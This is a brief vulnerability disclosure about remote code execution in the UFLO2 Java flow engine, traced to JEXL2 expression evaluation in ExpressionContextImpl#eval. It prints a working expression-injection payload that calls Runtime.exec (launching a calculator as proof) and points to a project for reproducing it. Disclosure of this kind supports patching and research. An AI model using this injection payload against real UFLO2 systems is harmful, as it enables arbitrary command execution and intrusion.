uflo2 rce
UFLO2 is an efficient flow engine written in java
GitHub:
https://github.com/youseries/uflo
Maven:
https://mvnrepository.com/artifact/com.bstek.uflo/uflo-console/2.1.5
https://mvnrepository.com/artifact/com.bstek.uflo/uflo-core/2.1.5
In the com.bstek.uflo.expr.impl.ExpressionContextImpl#eval
We can see EL execution based on jexl2
payload
1 | ${"123".Class.forName('java.lang.Runtime').getRuntime().exec(' open -a calculator')} |
(Press Enter to save the settings)
The project https://github.com/EvanLeung08/ufloExample can quickly start the UFLO2 (Only need to modify pom.xml to the correct version)